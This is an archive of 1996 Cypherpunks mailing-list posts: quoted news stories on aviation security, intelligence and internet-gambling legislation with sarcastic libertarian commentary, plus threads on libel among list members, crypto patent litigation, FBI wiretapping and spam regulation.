>   WASHINGTON (Oct 9, 1996 11:12 a.m. EDT) -- President Clinton today
>   signed into law an aviation spending bill he cheered for its airline
>   safety and counterterrorism provisions but that angers one of the
>   Democrats' biggest backers: organized labor.
   
>   "It will improve the security of air travel, it will carry forward our
>   fight against terrorism," Clinton said. "Americans will not only feel
>   safer, they will be safer."

	A: highly doubtful; B: what's that quote about Liberty and Security?
I'd comment on the increased searches that, from what I've seen, they'll do
no good whatsoever. I was searched on going through the Newark airport, and
had a _lot_ of hardback books in my suitcase... which the security drone
completely failed to riffle through to see if they were hollowed out with
explosives inside. Given the commonness of books as hiding places, this would
appear obvious... but what do you expect when people are selected for such
jobs by piss tests, "background checks" (e.g., not having any political
thoughts in their head other than pro-government ones), and Affirmative
Action?
   
>   The counterterrorism provisions reflected several recommendations made
>   by the White House Commission on Aviation Safety and Security, created
>   on July 25 by Clinton in the aftermath of the crash of TWA Flight 800
>   off Long Island.
   
>   Speaking at the bill-signing ceremony, Attorney General Janet Reno
>   called the legislation "another stage in our battle to secure our
>   people from the danger of terrorism."

	Unfortunately, her retirement due to Parkinson's won't help matters,
at least from how the current political situation looks.
   
>   Clinton made no mention of the provision in the bill that has upset
>   organized labor.

	At least there's that to say for the dammed bill.
   
>   Despite the flap over the Federal Express provision, the aviation
>   spending bill won Clinton's approval because of its central features:
>   authorizing $19 billion over two years for airport improvement,
>   maintenance and security.
   
>   The security provisions, such as requiring background checks of
>   baggage handlers, are among a host of new actions Clinton has pushed
>   to combat the threat of terrorism.
   
[...]

>   Clinton was introduced at the White House ceremony by Doug Smith, who
>   lost his daughter in the Oct. 31, 1994, crash of a commuter plane in
>   Roselawn, Ind., and who is now president of the National Air Disaster
>   Alliance, a family support group.
   
>   Smith thanked Clinton for the legislation, which he called "a major
>   step in the healing process for each of us." He called a moment of
>   silence for air disaster victims.

	Standard emotional politicking. I have every sympathy with the
victims, their families, and their friends (one of whom I know, from the
TWA 737 explosion)... but emotion isn't how to decide to pass laws.
   
>   The bill also authorizes the government to produce computer "profiles"
>   of passengers to track of travel patterns or other indicators that
>   raise suspicion of a security risk.
   
>   Flight lists also could be matched with lists of known terrorists
>   compiled by intelligence and law enforcement agencies. Similar methods
>   have been used in drug interdiction efforts in recent years.
   
	I suspect my family won't be seeing me as much...
   
>    Copyright (c) 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 26 Oct 1996 17:03:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NEWS] Clinton signs bill on intelligence
Message-ID: <01IB402W3P34A7370I@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


>   ______________________________________________________________________
>          Long Distance Free Call when you switch to AT&T for free
>   ______________________________________________________________________
>           Clinton to sign bill restructuring intelligence-gathering
>  __________________________________________________________________________
>      Copyright (c) 1996 Nando.net
>      Copyright (c) 1996 The Associated Press
      
>   CHAUTAUQUA, N.Y. (Oct 5, 1996 4:54 p.m. EDT) -- President Clinton will
>   sign a bill requiring modest changes in the U.S. intelligence
>   community, despite the CIA director's objection to one of its
>   provisions, officials said Saturday.
   
>   The officials, speaking on condition of anonymity, said the bill
>   satisfies Clinton's desire to restructure intelligence-gathering
>   agencies in light of post-Cold War threats.

	Translation: now that we're no longer using Communism as the
standard threat to justify stuff, we'll use terrorism et al.
   
>   The bill:
   
>   --Gives the FBI power to subpoena local telephone records.

	Remind me to use pay phones.
   
>   --Authorizes the Central Intelligence Agency and the National Security
>   Agency to collect data on foreign citizens for U.S. investigations.
   
>   --Requires Senate confirmation of the CIA's general counsel. That is
>   meant to prevent political influence over a position designed to block
>   illegal covert operations.

	Senate confirmation will _prevent_ political influence?
   
[...]

>   "We want to see some new structures developed to take into account our
>   need both to conserve resources, but also address some of the new
>   threats and the new challenges we face in the world," McCurry told
>   reporters at Clinton's pre-debate retreat.
   
>   Still, the bill presents a diminished version of reforms lawmakers
>   sought after scandals involving CIA activities in Guatemala,
>   misspending by the National Reconnaissance Office and years of
>   espionage by former CIA officer Aldrich Ames.
   
>    Copyright (c) 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 26 Oct 1996 18:32:02 -0700 (PDT)
To: legalpunks@toad.com
Subject: Re: slander and call for lawyers. :)
In-Reply-To: <Pine.SUN.3.94.961026164648.10071G-100000@polaris>
Message-ID: <199610270100.UAA20105@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Black Unicorn wrote:

> I'd be careful if I were you.  If said individual ever manages to
> substantiate damages you've got an interesting time ahead of you.

OK, suppose that this list was for legal punks...

Suppose that this winter Mr. X was elected Kook of the Month. Suppose
also that Mr. Y was very happy with this fact and his friends announced
it all over USENET, posting to all of the professional newsgroups that
Mr. X posts to, and several dozens of other newsgroups affected by Mr.
X.

Mr. X alleged that this announcement was actionable libel. Mr. Y thought
that since Mr. X really was elected, posting the truth could not be
actionable libel.

Mr. X, however, did not accept the results of Kook elections and simply
said that he was not a kook and all who say otherwise would be sued.

Various people got even happier, started laughing and posted messages to
the effect that Mr. X is a dumb liar in addition to being a cook. Mr. X
continued threatening lawsuits, but with no real action (due to extreme
lack of funds).

Who is right? Did Mr. Y's friends really libel Mr. X?

Thank you very much...

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 26 Oct 1996 17:11:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NEWS] Progress on Internet gambling
Message-ID: <01IB40C8FQD0A7370I@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


>   ______________________________________________________________________
>                               Ford Tarus SHO
>   ______________________________________________________________________
>                        Internet game gambling proposed
>  __________________________________________________________________________
>      Copyright (c) 1996 Nando.net
>      Copyright (c) 1996 Kansas City Star
      
>   LAS VEGAS (Oct 6, 1996 8:06 p.m. EDT) -- Casinos of the future will be
>   as close as your living room and betting will be as easy as a few
>   clicks of the mouse. And the future may be only a few weeks away.
   
>   At the World Gaming Congress & Expo in Las Vegas last week, an
>   Internet casino company announced that its "virtual reality" casino
>   will begin accepting electronic wagers on blackjack, craps, slot
>   machines and other games before the end of the year, and maybe by
>   Halloween.
   
>   "We're not looking for big-time gamblers," said Peter Michaels, chief
>   executive of World Wide Web Casinos Inc., based in Antigua. "We want
>   people who want to have a little fun....We think this is the wave of
>   the future."
   
>   Gamblers can place bets after establishing a minimum $300 credit
>   account with the company through computer transmission of a standard
>   bank credit card number.
   
>   There's an unquenched thirst for Internet entertainment, said Frank
>   Feather, who delivered the gaming expo's keynote address. Feather
>   predicted that public demand will blunt efforts to outlaw Internet
>   gambling. Not only will it thrive, he said, but it will become a
>   principal gaming medium.
   
>   "The Internet is the new frontier of gaming," Feather said. "It
>   basically eradicates geography....Internet gaming will be
>   unstoppable."
   
[...]

>   But how long Michaels' Web site gambling parlor -- and a few others
>   also about to go on line -- will stay in business is problematic.
   
>   Later this month, another would-be Internet casino operator will be in
>   a Minnesota courtroom, defending his operation. The international
>   gaming industry will be watching that test case to learn whether
>   states can regulate Internet commerce.

	Not having anything located in the US and other countries which
restrict gambling will help.
   
>   A court ruling earlier this year suggests they cannot. A federal court
>   in Philadelphia issued a ruling in June that protected free speech --
>   even pornographic speech -- on the Internet. That case struck a blow
>   for the First Amendment but threw sections of Congress' Communications
>   Decency Act into question.
   
>   The ruling, appealed by the Justice Department, offers hope to
>   Internet innovators such as Michaels that their gambling medium can
>   remain relatively free of government regulation.
   
>   But that won't happen if officials such as Minnesota Attorney General
>   Hubert H. Humphrey III have their way. Humphrey last year sued Granite
>   Gate Resorts Inc. of Las Vegas after it promoted itself on the Web as
>   a legal enterprise that was "coming soon."
   
>   Casino gambling, with some exceptions, is illegal in Minnesota,
>   Humphrey contended, and it is a federal crime to transmit any gambling
>   data through interstate communications wires. But it's not just
>   Internet gamblers who worry Humphrey.
   
>   "Anyone with a computer and telephone can start soliciting on the
>   Internet," he said in court documents, arguing that his state's
>   consumers must be protected from the unscrupulous.

	If somebody's dumb enough to gamble without looking for some
protections from fraud (or, in any event, to gamble on pure chance), they
don't deserve protection. If someone wants to rant and rave about the
poor problem gamblers, I'd point out A: alcoholics and Prohibition; and B:
I'd prefer people getting an adrenalin high from gambling to their getting
it out on the highways.
   
>   Granite Gate contends that the state of Minnesota lacks jurisdiction
>   to regulate its commercial transactions.
   
>   The Justice Department has been silent on the issue over the last
>   year, during which more than 200 gambling-related home pages have
>   opened on the Web. Most offer only advice or hints of real gambling to
>   come, and several offer games "for amusement only."
   
>   The government acknowledges that Internet technology has emerged too
>   rapidly and -- for those based offshore -- well beyond the reach of
>   existing laws.
   
>   "There is nothing we can do about people that operate gambling
>   businesses outside of the United States," said John Russell, a Justice
>   Department spokesman.

	Chuckle...
   
>   Michaels quotes Russell to that very effect in World Wide Web Casinos'
>   promotional material, which also solicits investors in the company.
   
>   Peter Demos, the casino's president, said the company is taking a hard
>   stand on the legality question.
   
>   "At this point we are considering the United States to be a legal
>   jurisdiction to book bets, and we will take bets from the United
>   States until some attorney general or somebody tells us that it is
>   their position that it is illegal," Demos said. "Until laws are passed
>   to make it illegal, it is in fact legal."
   
>   Many of the World Wide Web Casinos' 80 employees are at its Santa Ana,
>   Calif., offices, where most of the computer graphics work and other
>   nongambling functions take place.

	That's probably not a good idea.
   
>   The company also runs the St. James Casino Club in Antigua, where the
>   gambling side of the Internet casino will be based.
   
[...]

>   Winners will be paid with electronic credits through a company-issued
>   Visa debit card that is accepted worldwide, he said.

	One wonders how much tracking there will be of usage of that card?
   
>   Michaels' company also is establishing a self-policing industry group
>   that will set standards for Internet gambling.
   
[...]

>   At the Las Vegas convention, Cyberspace President Ronald A. Angiers
>   also announced the establishment of his firm's Internet Gaming Board,
>   which aims to certify various gambling operations as both honest and
>   solvent to protect the fledgling industry's integrity and to mediate
>   disputes.
   
>   "There's great potential for corruption and unfair gaming practices,"
>   he said.
   
>    Copyright (c) 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 26 Oct 1996 18:50:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: slander and call for lawyers. :)
In-Reply-To: <Pine.SUN.3.94.961026164648.10071G-100000@polaris>
Message-ID: <ZToFwD13w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:
> Suggesting that a person is on a psychoactive mediciation with the purpose
> of harming that persons image or character is likely actionable.

William Shakespeare has a very appropriate AP quote in Henry IV(?).

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sat, 26 Oct 1996 21:38:29 -0700 (PDT)
To: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Subject: Re: Prof Shamir arrested
Message-ID: <v02130509ae9830a37d34@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Jim Bell wrote:
>[many things on "fraud"]
>
>Excuse me if I don't react on this in detail. We have already
>explained it, and there it stands: fraud means playing a game without
>abiding by its rules. It's perfectly legitimate to establish a game
>and to introduse rules of the game with it. If you want to play the
>game, play by its rules, otherwise don't play it. If you play it
>while cheating, though, you must bear the consequences ("go directly
>to jail" ;-).
>

Or play the game the way nations do, be prepared to meet LE with equal or
greater force or creditable threat of same.

-- Steve







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Sat, 26 Oct 1996 19:51:07 -0700 (PDT)
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Merc: PacBell predicts imminent death of the net; film at 11
In-Reply-To: <Pine.GUL.3.95.961024202749.24299C-100000@Networking.Stanford.EDU>
Message-ID: <rogerbudpt6ef.fsf@trout.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Rich Graves <llurch@networking.stanford.edu> writes:

  > Pac Bell says Net use may collapse phone system

  > [...]

  > Wiping out the subsidy would force Internet companies to find new,
  > more efficient ways of pricing that better reflect actual usage,
  > Parker said.

I caught an interview on the BBC last night with a representative from
PacBell, who claimed that this subsidy resulted in ISPs actively
discouraging customers from using data service (ISDN) instead of POTS.

Bwahahaha...

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: se7en <se7en@dis.org>
Date: Sun, 27 Oct 1996 04:48:43 -0800 (PST)
To: DC-Stuff List <dc-stuff@dis.org>
Subject: DC Digest
Message-ID: <Pine.BSI.3.91.961027050557.6102A-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain



What a pain in the ass! You leave town for a bit and the backlog gets 
insane! Anyway, http://www.dis.org/se7en/  and click on DC-Digest for 
those of you who wanna save your inbox. Other issues will appear 
tomorrow, starting with more recent, and going back to the older.

All signal, no noise. Each post is hyperlinked from a table of contents, 
and every follow-up post is hyperlinked to the original post. All email 
addresses and URLs are also hyperlinked. Order is *slighty* skewed to 
read more coherently, and can be read from top to bottom for maximum 
effectiveness.

Off to bed,

se7en




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Sun, 27 Oct 1996 05:24:02 -0800 (PST)
To: Black Unicorn <cypherpunks@toad.com
Subject: Re: slander and call for lawyers. :)
In-Reply-To: <Pine.SUN.3.94.961026164648.10071G-100000@polaris>
Message-ID: <199610271337.HAA26385@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.SUN.3.94.961026164648.10071G-100000@polaris>, on 10/26/96 at 04:48 PM,
   Black Unicorn <unicorn@schloss.li> said:

>On Fri, 25 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

>> Sandy Sandfort <sandfort@crl.com> writes:
>> > 
>> > On Fri, 25 Oct 1996, Black Unicorn wrote to Dimitri:
>> > 
>> > > If you don't watch it I'll have a pair of my staff represent
>> > > [Ray] free of charge.
>> > 
>> > Now THAT would be a community service.
>> 
>> Why don't you use the funds pledges for my defunct trip to California
>> for Ray's lithium bill.

>Suggesting that a person is on a psychoactive mediciation with the purpose of
>harming that persons image or character is likely actionable.

>I'd be careful if I were you.  If said individual ever manages to
>substantiate damages you've got an interesting time ahead of you.

Well as much as it pains me to take Dimitri's side I doubt that any damages can be
proved by his statements on this list. My reasoning for this opinion is as follows:

A.  Dimitri is a nut, kook, ...ect. Definitely suffering from dimished capacity.

B. Everyone on the list is aware of point A.

C. So with A & B true when Dimitri makes his nutty statements they are taken by the
list as just that, nutty statements. 

Under the above I find it hard to see any real damage caused by Dimitri's statements.
Granted Dimitri is an anoying pest, I don't think that a lawsuite will do anything to
slow him down as I don't see one as winable.


--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
*MR/2 ICE: Have you crashed your Windows today?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Mon, 28 Oct 1996 02:58:51 -0800 (PST)
To: Black Unicorn <cypherpunks@toad.com
Subject: Re: slander and call for lawyers. :)
In-Reply-To: <Pine.SUN.3.94.961026164648.10071G-100000@polaris>
Message-ID: <m0vHpNG-000XEQa@maila.uscs.susx.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.SUN.3.94.961026164648.10071G-100000@polaris>, on 10/26/96 at 04:48 PM,
   Black Unicorn <unicorn@schloss.li> said:

>On Fri, 25 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

>> Sandy Sandfort <sandfort@crl.com> writes:
>> > 
>> > On Fri, 25 Oct 1996, Black Unicorn wrote to Dimitri:
>> > 
>> > > If you don't watch it I'll have a pair of my staff represent
>> > > [Ray] free of charge.
>> > 
>> > Now THAT would be a community service.
>> 
>> Why don't you use the funds pledges for my defunct trip to California
>> for Ray's lithium bill.

>Suggesting that a person is on a psychoactive mediciation with the purpose of
>harming that persons image or character is likely actionable.

>I'd be careful if I were you.  If said individual ever manages to
>substantiate damages you've got an interesting time ahead of you.

Well as much as it pains me to take Dimitri's side I doubt that any damages can be
proved by his statements on this list. My reasoning for this opinion is as follows:

A.  Dimitri is a nut, kook, ...ect. Definitely suffering from dimished capacity.

B. Everyone on the list is aware of point A.

C. So with A & B true when Dimitri makes his nutty statements they are taken by the
list as just that, nutty statements. 

Under the above I find it hard to see any real damage caused by Dimitri's statements.
Granted Dimitri is an anoying pest, I don't think that a lawsuite will do anything to
slow him down as I don't see one as winable.


--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
*MR/2 ICE: Have you crashed your Windows today?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Sun, 27 Oct 1996 08:22:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Fed Ct hrg re Diffie-Hellman & Hellman-Merkle patents
Message-ID: <199610271623.IAA06065@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



Peter D. Junger observes:
> The server at www.cruzio.com reports:
>   The requested URL /~schlafly was not found on this server.
> Does anyone have a valid URL for this information?

It's really http://bbs.cruzio.com/~schlafly/

thad
-- Thaddeus Beier                     thad@hammerhead.com
   Visual Effects Supervisor                408) 286-3376
   Hammerhead Productions  http://www.got.net/people/thad




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sun, 27 Oct 1996 05:22:31 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Fed Ct hrg re Diffie-Hellman & Hellman-Merkle patents
In-Reply-To: <3.0b28.32.19961026145513.006f6910@ricochet.net>
Message-ID: <199610271325.IAA22167@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles writes:

: 
: A hearing is scheduled in federal district court in San Jose for 10/30 at
: 10:00 AM on _Schlafly v. Public Key Partners_ and _RSA Datasec v. Cylink_.

: More information is available at <http://www.cruzio.com/~schlafly> and
: <http://www.sec.gov/Archives/edgar/data/1005230/0000950005-96-000312.txt>.

The server at www.cruzio.com reports:

  The requested URL /~schlafly was not found on this server.

Does anyone have a valid URL for this information?

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu
                     URL:  http://samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Mon, 28 Oct 1996 03:09:37 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Fed Ct hrg re Diffie-Hellman & Hellman-Merkle patents
In-Reply-To: <3.0b28.32.19961026145513.006f6910@ricochet.net>
Message-ID: <m0vHpXn-000XDNa@maila.uscs.susx.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles writes:

: 
: A hearing is scheduled in federal district court in San Jose for 10/30 at
: 10:00 AM on _Schlafly v. Public Key Partners_ and _RSA Datasec v. Cylink_.

: More information is available at <http://www.cruzio.com/~schlafly> and
: <http://www.sec.gov/Archives/edgar/data/1005230/0000950005-96-000312.txt>.

The server at www.cruzio.com reports:

  The requested URL /~schlafly was not found on this server.

Does anyone have a valid URL for this information?

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu
                     URL:  http://samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 27 Oct 1996 06:40:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: slander and call for lawyers. :)
In-Reply-To: <199610271337.HAA26385@mailhub.amaranth.com>
Message-ID: <91mgwD31w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"William H. Geiger III" <whgiii@amaranth.com> writes:
> A.  Dimitri is a nut, kook, ...ect. Definitely suffering from dimished capacity

This can be used as an excuse in a criminal trial, but I don't think this
applies to civil - does it?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Sun, 27 Oct 1996 10:25:07 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com>
Subject: tcmay in favour of redistribution of wealth? NFW/ROTFL
In-Reply-To: <9609248461.AA846180758@smtplink.alis.ca>
Message-ID: <199610271924.MAA12317@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-. 
-."Timothy C. May" <tcmay@got.net> wrote:
-.
-.>I guess I'm not much of a joiner. I never donated to the United Way
-.>
 
        et tu, Brute?  I thought I was the only one who deliberately 
    stiffed the United Way, 

        The recent jailing of the national chairman of the United Way
    for pilfering multiple millions from the coffers, and squandering
    even more on lavish expense account jet-setting...  is more than 
    adequate justification to stiff the United Way.


-.>If this sounds harsh, so be it. 
-.>Cypherpunks is not about redistributing wealth. 
-.>

        no, cypherpunks is not about redistributing the wealth; at
    least, certainly not the vocal, active active members, and probably
    most of the rest as organized politics turns the stomach of anyone
    of knowledge, even skewed as it may be.

        redistributing the wealth is over in *.politics.*, &c.


In <9609248461.AA846180758@smtplink.alis.ca>, on 10/24/96 
   at 11:13 AM, jbugden@smtplink.alis.ca said:

-.Ahh, but you don't really believe this. Your vision of cypherpunks is
-.all about redistributing wealth. Just not in the sense you speak of.
-.
        Tim redistributing the wealth?!?  I'll be ROTFL for days over 
    the "insult."  

        Come on, James, get with the program.  Arguing that the elite
    rich are narrowing our margins as they steal from 99% of the
    population, and *maybe* they need to be curtailed, in not
    redistribution of wealth --in Canada, you call the real thing the
    National Health Services which supposedly provides cradle to the
    grave social services (which is bankrupting Canada).

-.There is naivete and then there is complicity.
-.

        I dunno, James... 

        so where do you draw the line?  Isn't most anyone who accepts
    money for employment these days guilty of complicity?  If not, why
    not? --they are, after all, selling their principles for the
    proverbial loaf of bread.

        I agree there can be stupidity --Americans, in particular, with
    30% functionally illiterate are more often stupid and uninformed
    than most members of the industrial world, However, even these
    "mentally challenged" (note the politically correct terminology)
    sloths (not very PC) have the one eyed monster telling them all the
    truth their masters wish them to hear.  we do not have political
    consultants and advertising agencies --we have PR teams.

        since the usurpers of the public trust don't allow me to enter: 
    "none of the above" I have never voted --I'm just waiting for the 
    time the politicals stage an election and noboy votes  --that is one
    of the few means of telling them we dont like what any of the 
    stooges will actually do when elected.

            ==attila  (6A27:0920 UT)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sun, 27 Oct 1996 09:01:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <01BBC453.10341900@sharadid.cbn.net.id>
Message-ID: <Pine.3.89.9610270859.A22713-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 27 Oct 1996, sharadid@cbn.net.id wrote:

> unsuscribe cypherpunks

These people must be making fun of us. I can't believe that on average 
only one in five or more knows how to spell "unsubscribe".

-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.


 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 27 Oct 1996 06:07:38 -0800 (PST)
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: slander and call for lawyers. :)
In-Reply-To: <199610270100.UAA20105@manifold.algebra.com>
Message-ID: <Pine.SUN.3.94.961027090602.23139C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 26 Oct 1996, Igor Chudov @ home wrote:

> Black Unicorn wrote:
> 
> > I'd be careful if I were you.  If said individual ever manages to
> > substantiate damages you've got an interesting time ahead of you.
> 
> OK, suppose that this list was for legal punks...

[Facts deleted]

> Who is right? Did Mr. Y's friends really libel Mr. X?

You really want an answer to this?

> Thank you very much...
> 
> 	- Igor.
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 27 Oct 1996 06:29:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: BYE_4th
Message-ID: <1.5.4.32.19961027142851.006978cc@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-27-96. WaPo:

   "Heightened Tensions Over Digital Taps. Telecommunications
   Industry, FBI at Odds Over High-Tech Tools"

      Telco officials say that the FBI aims to force phone
      companies to build extensive surveillance systems into
      their telephone networks that will likely open new
      avenues of surveillance for government wiretappers.

      Freeh has testified that his agency is "simply trying to
      catch up with technology." In recent interviews,
      however, his senior aides insisted there are virtually
      no limits to the types and amount of information they
      can intercept once a judge signs a court order.

      "It would be stupid of us, as a police agency, not to take
      advantage of information in the system to solve crime,"
      said James Kallstrom. "That shouldn't shock you. The
      technology offers a lot more."
   
   -----

   http://jya.com/bye4th.txt  (10 kb)

   ftp://jya.com/pub/incoming/bye4th.txt

   BYE_4th







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Sun, 27 Oct 1996 09:37:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Junkbusters: Invite the Government in!
Message-ID: <199610271737.JAA19390@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


QUOTE

A direct quote from:   http://www.junkbusters.com/ht/en/spam.html

We think that junk email should be made illegal in the same way that
junk faxes have been outlawed in the US. Unfortunately it will take
lawmakers some time to get around to it, and even then spammers would
probably try remailing through other jurisdictions to evade
regulation. 

END QUOTE.

I have only posted to this list RE: Internet Marketing and Spam.  I 
have found that the general feeling runs against regulation of the 
internet.  These Junkbuster people are crying for government 
intervention.  The government coming into the internet is a bad idea.
Therefore: Junkbusters is a bad idea.

Ross

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Briggs <72124.3234@compuserve.com>
Date: Sun, 27 Oct 1996 08:28:19 -0800 (PST)
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: Fed Ct hrg re Diffie-Hellman & Hellman-Merkle patents
In-Reply-To: <199610271325.IAA22167@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <32738D99.3981@compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter D. Junger wrote:
> 
> Greg Broiles writes:
> 
> :
> : A hearing is scheduled in federal district court in San Jose for 10/30 at
> : 10:00 AM on _Schlafly v. Public Key Partners_ and _RSA Datasec v. Cylink_.
> 
> : More information is available at <http://www.cruzio.com/~schlafly> and
> : <http://www.sec.gov/Archives/edgar/data/1005230/0000950005-96-000312.txt>.
> 
> The server at www.cruzio.com reports:
> 
>   The requested URL /~schlafly was not found on this server.
> 
> Does anyone have a valid URL for this information?


Schlafly's web site is http://bbs.cruzio.com:80/~schlafly

Kent




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sun, 27 Oct 1996 10:37:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Reason for AP anonymity
Message-ID: <v0213050fae98fa15d164@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


Astrologer released after predicting death of Venezuela president

By Vivian Sequera
ASSOCIATED PRESS

CARACAS, Venezuela - An astrologer who predicted 80 year-old President
Rafael Caldera's "death" next year was released by political police
Thursday after two days of questioning in detention.

Jose Bernardo Gomez, 47, said he was detained "because I spoke about the
possibility of the death of President Caldera."

The widely feared Department of Intelligence and Prevention Services wanted
to know where Gomez At his information, he said, and whether he was
connected to leftist political groups.

Caldera's astrological chart ,show that "Uranus is over the sun, Pluto is
in ascendancy and Mars is going behind its moon" - not a good sign for the
president, Gomez told police.

"I've been sustaining the possibility of the death of the president of the
republic for a long time," Gomez said, adding that the word "death" is
